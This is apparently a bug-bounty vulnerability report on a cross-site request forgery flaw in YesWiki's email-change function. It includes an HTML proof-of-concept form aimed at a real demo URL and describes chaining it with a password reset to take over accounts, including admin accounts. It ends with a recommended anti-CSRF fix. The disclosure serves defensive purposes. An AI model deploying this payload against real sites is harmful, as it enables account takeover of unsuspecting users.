Cross-Site Request Forgery (CSRF) in yeswiki/yeswiki
Dec 6th 2021
so i found that YesWiki doesn't implement any sort of anti-csrf mechanism, i found that the change email function is vulnerable to CSRF attacks which leads to Account Takeover.
Proof of Concept
<html> <body> <form method="POST" action="https://yeswiki.net/cercopitheque/demo/?ParametresUtilisateur"> <input type="hidden" name="usersettings_action" value="update"/> <input type="hidden" name="email" value="firstname.lastname@example.org"/> <input type="hidden" name="revisioncount" value="20"/> <input type="submit" value="Submit"> </form> </body> <html>
An attacker sends the above PoC to the victim.
rather than submit, the autosubmit attribute could be implemented, so the victim's email will be changed and he will be redirected to a third site.
an attacker now will reset his password via the changed email and he will be able to takeover the account.
NOTE: the attack could be applied to the admin account user which could be harmful to other users leading to compromise their confidentiality, integrity and availability.
Implementing a anti-csrf AND/OR anti-csrf header with server-side checks should be sufficient to resolve the root cause of the issue.
Taking over user accounts.